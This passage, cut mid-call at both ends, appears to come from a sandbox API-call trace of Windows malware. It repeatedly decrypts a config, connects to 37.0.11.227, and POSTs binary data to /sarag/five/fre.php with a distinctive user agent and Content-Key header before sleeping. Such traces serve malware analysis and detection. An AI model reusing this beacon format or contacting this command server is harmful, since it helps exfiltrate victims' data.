lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0174.771] GetProcessHeap () returned 0x690000 [0174.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0174.889] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xefc) returned 0x284 [0174.925] Sleep (dwMilliseconds=0xea60) [0175.091] GetProcessHeap () returned 0x690000 [0175.091] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0175.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.093] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0175.484] GetProcessHeap () returned 0x690000 [0175.484] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87c0 [0175.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.578] CryptImportKey (in: hProv=0x6af100, pbData=0x6a87c0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0175.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.579] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.582] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.582] GetProcessHeap () returned 0x690000 [0175.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87c0 | out: hHeap=0x690000) returned 1 [0175.583] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.584] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0175.584] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.585] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0175.585] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.588] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0175.588] GetProcessHeap () returned 0x690000 [0175.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0175.589] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.589] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.590] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.591] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.592] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.592] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.593] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.593] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.593] GetProcessHeap () returned 0x690000 [0175.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0175.593] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.594] GetProcessHeap () returned 0x690000 [0175.594] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0175.594] GetProcessHeap () returned 0x690000 [0175.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0175.595] GetProcessHeap () returned 0x690000 [0175.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0175.595] GetProcessHeap () returned 0x690000 [0175.595] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0175.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.623] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.624] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0175.632] GetProcessHeap () returned 0x690000 [0175.632] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8790 [0175.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.633] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0175.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.634] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.640] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.640] GetProcessHeap () returned 0x690000 [0175.641] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8790 | out: hHeap=0x690000) returned 1 [0175.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.644] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0175.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.645] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0175.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.646] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0175.646] GetProcessHeap () returned 0x690000 [0175.647] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0175.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.648] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0175.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.649] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0175.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.650] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0175.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.651] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0175.654] GetProcessHeap () returned 0x690000 [0175.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0175.654] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0175.654] GetProcessHeap () returned 0x690000 [0175.654] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0175.654] socket (af=2, type=1, protocol=6) returned 0x288 [0175.655] connect (s=0x288, name=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0175.735] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb20*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0175.735] GetProcessHeap () returned 0x690000 [0175.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0175.735] GetProcessHeap () returned 0x690000 [0175.735] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0175.748] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0175.749] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.749] GetProcessHeap () returned 0x690000 [0175.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0175.750] GetProcessHeap () returned 0x690000 [0175.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0175.750] GetProcessHeap () returned 0x690000 [0175.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0175.750] GetProcessHeap () returned 0x690000 [0175.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0175.751] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0175.752] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.753] GetProcessHeap () returned 0x690000 [0175.753] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0175.753] GetProcessHeap () returned 0x690000 [0175.753] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0175.754] send (s=0x288, buf=0x6ac520*, len=242, flags=0) returned 242 [0175.758] send (s=0x288, buf=0x6aba40*, len=159, flags=0) returned 159 [0175.758] GetProcessHeap () returned 0x690000 [0175.758] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0175.758] recv (in: s=0x288, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0175.845] GetProcessHeap () returned 0x690000 [0175.845] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0175.845] GetProcessHeap () returned 0x690000 [0175.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0175.846] GetProcessHeap () returned 0x690000 [0175.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0175.846] GetProcessHeap () returned 0x690000 [0175.847] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0175.847] closesocket (s=0x288) returned 0 [0175.850] GetProcessHeap () returned 0x690000 [0175.850] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0175.850] GetProcessHeap () returned 0x690000 [0175.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0175.851] GetProcessHeap () returned 0x690000 [0175.851] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0175.851] GetProcessHeap () returned 0x690000 [0175.852] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0175.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x77c) returned 0x288 [0175.857] Sleep (dwMilliseconds=0xea60) [0175.860] GetProcessHeap () returned 0x690000 [0175.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0175.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.878] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.879] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0175.897] GetProcessHeap () returned 0x690000 [0175.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0175.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.898] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0175.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.900] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.901] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.901] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.901] GetProcessHeap () returned 0x690000 [0175.902] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0175.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.903] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0175.904] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.904] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0175.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.906] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0175.906] GetProcessHeap () returned 0x690000 [0175.906] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0175.907] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.907] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0175.908] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.908] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0175.912] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.912] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0175.914] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.914] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0175.914] GetProcessHeap () returned 0x690000 [0175.914] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0175.914] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0175.915] GetProcessHeap () returned 0x690000 [0175.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0175.916] GetProcessHeap () returned 0x690000 [0175.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0175.917] GetProcessHeap () returned 0x690000 [0175.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0175.917] GetProcessHeap () returned 0x690000 [0175.917] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0175.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.921] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0175.928] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0175.936] GetProcessHeap () returned 0x690000 [0175.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8790 [0175.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.938] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8790, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0175.938] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.939] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0175.939] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.940] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0175.940] GetProcessHeap () returned 0x690000 [0175.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8790 | out: hHeap=0x690000) returned 1 [0175.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.945] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0175.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.946] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0175.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0175.948] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0175.948] GetProcessHeap () returned 0x690000 [0175.948] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0175.949] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.949] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0175.950] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.951] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0175.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.952] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0175.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0175.956] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0175.956] GetProcessHeap () returned 0x690000 [0175.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0175.956] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9d0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0175.956] GetProcessHeap () returned 0x690000 [0175.956] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab450 [0175.956] socket (af=2, type=1, protocol=6) returned 0x28c [0175.957] connect (s=0x28c, name=0x6ae9d0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0175.983] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9d0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0175.983] GetProcessHeap () returned 0x690000 [0175.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0175.983] GetProcessHeap () returned 0x690000 [0175.983] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0175.984] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0175.985] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0175.985] GetProcessHeap () returned 0x690000 [0175.985] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0175.985] GetProcessHeap () returned 0x690000 [0175.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0175.989] GetProcessHeap () returned 0x690000 [0175.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0175.989] GetProcessHeap () returned 0x690000 [0175.989] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0175.990] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0175.991] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0175.991] GetProcessHeap () returned 0x690000 [0175.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0175.991] GetProcessHeap () returned 0x690000 [0175.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0175.992] send (s=0x28c, buf=0x6ac520*, len=242, flags=0) returned 242 [0175.993] send (s=0x28c, buf=0x6aba40*, len=159, flags=0) returned 159 [0175.993] GetProcessHeap () returned 0x690000 [0175.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0175.993] recv (in: s=0x28c, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0176.067] GetProcessHeap () returned 0x690000 [0176.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0176.068] GetProcessHeap () returned 0x690000 [0176.068] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0176.068] GetProcessHeap () returned 0x690000 [0176.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0176.069] GetProcessHeap () returned 0x690000 [0176.069] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0176.069] closesocket (s=0x28c) returned 0 [0176.070] GetProcessHeap () returned 0x690000 [0176.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab450 | out: hHeap=0x690000) returned 1 [0176.070] GetProcessHeap () returned 0x690000 [0176.070] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0176.071] GetProcessHeap () returned 0x690000 [0176.071] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0176.071] GetProcessHeap () returned 0x690000 [0176.072] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0176.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xff4) returned 0x28c [0176.077] Sleep (dwMilliseconds=0xea60) [0176.079] GetProcessHeap () returned 0x690000 [0176.079] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0176.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.081] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0176.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0176.093] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0176.103] GetProcessHeap () returned 0x690000 [0176.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0176.104] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 